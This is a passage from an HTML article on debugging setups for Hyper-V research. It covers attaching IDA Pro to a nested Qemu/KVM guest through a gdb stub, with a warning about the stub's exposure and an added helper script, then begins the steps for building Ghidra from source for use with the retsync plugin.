font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">While this article was being written, rizin, a fork of </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">radare2</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, was 
created. Cutter migrated to that framework.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.10.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Qemu</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Qemu supports nested virtualization, but without an accelerator qemu works very slowly. An accelerator with nested virtualization is available on the Linux platform. 
</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The demo was made on Ubuntu 20.04.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Install Qemu and virt-manager:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 
700; text-decoration: none; vertical-align: baseline;">sudo apt-get install qemu qemu-kvm virt-manager</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run Virtual Machine Manager and create a virtual machine with a reasonable configuration (for example 2 CPUs and 8 GB of memory).</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; 
font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Install Windows 10 as the guest. Using VirtIO drivers for the disk improves performance.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Install Hyper-V in the guest OS, and a guest OS inside that Hyper-V. 
Shut down the VM.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enable the gdb stub in Qemu:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">virt-xml <vm_name> --edit --confirm --qemu-commandline='-s'</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Note that -s is shorthand for -gdb tcp::1234, which listens on every interface of the host, and the stub gives whoever connects unauthenticated read and write access to the VM's memory and registers. If IDA runs on another machine, bind the stub to one address instead (-gdb tcp:ADDRESS:1234) or restrict the port with a firewall. Open the XML config in Virtual Machine Manager: the additional 
qemu:commandline option appears there.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 251px; overflow: hidden; width: 504px;"><img height="251" src="https://lh5.googleusercontent.com/J2_WxBeabnOSgm0RNysqAGXBwtgdR5olyLtbs8U50u5zUMtP8ekkKxOVpvevC30eI8QF3V_qu64lHVFp-X0K93fcuf-_yQIWRduVc5Tzqwq98SW0m21eT0MJAaXqDVUSQ3PwI5WsitJNjzQrnw" style="margin-left: 0px; margin-top: 0px;" width="504" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Power on the VM.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; 
text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 297px; overflow: hidden; width: 472px;"><img height="297" src="https://lh4.googleusercontent.com/qoD4EvbvunJT6kDYvHii-0-vaqlw_apAwvi4aObGr31IHefgOj7Nu084s4bFcNT6Bx2HmLafIzQzQ8d9sHLjWdAC3O7-GUc3Kv8FH6MXVMuxef4InJF-ytv51nRycEUCaJ8ppBD2EwYS9PMEIQ" style="margin-left: 0px; margin-top: 0px;" width="472" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">7.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Check that the port is listening (the default port is 1234):</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" 
style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">netstat -antp | grep 1234</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">8.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Start IDA Pro and select </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugger->Attach->Remote GDB debugger</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. 
Set the IP address of the Qemu-KVM host and press OK.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 149px; overflow: hidden; width: 267px;"><img height="149" src="https://lh4.googleusercontent.com/4TghHBMYPt6QwrBuvflGGBjhALdXuo16ZKPCoSuqk5-oydOHvl07pmFcnDFWHvZmScblIdRK2XbOgZWnLS--LxQ-arOlvP7i_hDBKUfOzLUPaYDwOJ1pV44O5zFzxrF6G5VzdSLtiQyQ7jFzNw" style="margin-left: 0px; margin-top: 0px;" width="267" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">9.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You will be inside the Qemu guest VM (the hypervisor, the host OS 
or a guest OS). The stub stops the vCPU wherever it happens to be, so which of the three you land in depends on what was executing at the moment you attached.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="129" src="https://lh6.googleusercontent.com/_nLTnUFWzoU0jMVEv2zj2WPm1qnGUhvVcQ8MwpcrfDNaD4J25xJ80-ca6J-sxaJsD2zLvM0n4OS8LThiSS8eiRmcmr-0Q2hvxbSU_mTdFljM-0yDdDYmJT1KzTQy6dyM9cWBIrxHkPKCI0GRTQ" style="margin-left: 0px; margin-top: 0px;" width="671" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.11.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Ghidra + retsync plugin</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; 
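The host-side part of the Qemu/KVM procedure in 2.10 above, as an added example that is not from the original article: one script that checks the nested-virtualization precondition, opens the gdb stub bound to a single address instead of the article's -s (shorthand for -gdb tcp::1234, which listens on every interface), starts the VM and verifies the listener. The domain name win10-hv, the bind address, the script name hv-gdb.sh and the use of virsh instead of the Virtual Machine Manager GUI are assumptions; the setup function is meant to run on the Ubuntu host in place of step 5, after steps 1-4.

```shell
#!/bin/sh
# Added example (not part of the original article): host-side helper for
# debugging a nested Hyper-V guest under QEMU/KVM through the gdb stub.
# Assumptions not stated in the article: libvirt domain "win10-hv"; the
# machine running IDA can reach the address in GDB_BIND.

VM_NAME="${VM_NAME:-win10-hv}"     # assumed libvirt domain name
GDB_BIND="${GDB_BIND:-127.0.0.1}"  # stub bind address; use the host's LAN
                                   # address only if IDA runs elsewhere
GDB_PORT="${GDB_PORT:-1234}"       # QEMU's default gdb stub port

# Returns 0 when a kvm 'nested' parameter value means enabled (Y on current
# kernels, 1 on older ones). Takes the value as text so it is testable offline.
nested_value_enabled() {
    case "$1" in
        Y|y|1) return 0 ;;
        *)     return 1 ;;
    esac
}

# Reads the parameter from whichever kvm module is loaded on this host.
kvm_nested_enabled() {
    for f in /sys/module/kvm_intel/parameters/nested \
             /sys/module/kvm_amd/parameters/nested; do
        [ -r "$f" ] && nested_value_enabled "$(cat "$f")" && return 0
    done
    return 1
}

# Builds the QEMU argument for a gdb stub bound to one address. The stub gives
# unauthenticated read/write access to guest memory and registers, so it must
# not be exposed more widely than the debugging host needs.
gdb_stub_arg() {
    printf -- '-gdb tcp:%s:%s' "$1" "$2"
}

# Returns 0 when 'ss -ltn' (or 'netstat -ltn') output passed as $2 shows a
# listener on port $1. Text is passed in so the check runs without a VM.
port_listening_in() {
    printf '%s\n' "$2" | grep -Eq ":$1([[:space:]]|\$)"
}

# Full host-side flow; runs only when invoked as: ./hv-gdb.sh setup
setup() {
    if ! kvm_nested_enabled; then
        echo "nested virtualization is off (try: modprobe -r kvm_intel; modprobe kvm_intel nested=1)" >&2
        return 1
    fi
    # Expose VT-x/AMD-V to the guest so Hyper-V can start inside it.
    virt-xml "$VM_NAME" --edit --cpu host-passthrough
    # Same effect as the article's '-s', but bound to GDB_BIND only.
    virt-xml "$VM_NAME" --edit --qemu-commandline="$(gdb_stub_arg "$GDB_BIND" "$GDB_PORT")"
    virsh start "$VM_NAME"
    if port_listening_in "$GDB_PORT" "$(ss -ltn)"; then
        echo "gdb stub listening on $GDB_BIND:$GDB_PORT; attach IDA with Remote GDB debugger"
    else
        echo "no listener on port $GDB_PORT" >&2
        return 1
    fi
}

if [ "${1:-}" = "setup" ]; then
    setup
fi
```

The functions that inspect text (the nested flag value, the listener table) take it as an argument rather than reading /sys or running ss themselves, so the decision logic can be checked on a machine without KVM; the setup function is the only part that touches the host.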
text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A good Ghidra book is “The Ghidra Book: The Definitive Guide”.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can download a compiled build of Ghidra from </span><a href="https://ghidra-sre.org/" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://ghidra-sre.org/</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and retsync from </span><a href="https://github.com/bootleg/ret-sync" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; 
vertical-align: baseline;">https://github.com/bootleg/ret-sync</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In my case the Ghidra 9.1 distribution had been built over 8 months ago, so I decided to compile it from source. </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Update: it’s funny that I built Ghidra on 11.11.2020, and on 13.11.2020 the NSA uploaded the public 9.2 build to their server. 
Sometimes it is good that the NSA has hacked all the computers in the world ))</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 225px; overflow: hidden; width: 271px;"><img height="225" src="https://lh6.googleusercontent.com/mDahCyoDq5dSixEkToe3dnO7-NhWdTIFsuYY1wjFjy0jvwYUGogPPIYL71QhbaphX47_gjHCSE7mD4iAMsw4HGYC9dSAu761flOu_ssr4agAaRXHS231L1ox-Mwlww-4YdkGVeysApoenFKYhw" style="margin-left: 0px; margin-top: 0px;" width="271" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">But I keep the short build instructions in the article. 
</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The full build instructions can be found at:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><a href="https://github.com/NationalSecurityAgency/ghidra/blob/master/DevGuide.md" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/NationalSecurityAgency/ghidra/blob/master/DevGuide.md</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Build steps:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span 
face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Download the Ghidra source from </span><a href="https://github.com/NationalSecurityAgency/ghidra" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/NationalSecurityAgency/ghidra</span></a></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: 
normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Download and install Maven, Gradle, win flex+bison (version 2.5.3; version 3 gives errors during compilation; rename the binaries to flex.exe and bison.exe), Visual Studio 2019 and the Windows 10 SDK;</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run, from the source tree root: </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">gradle --init-script gradle/support/fetchDependencies.gradle init</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; 
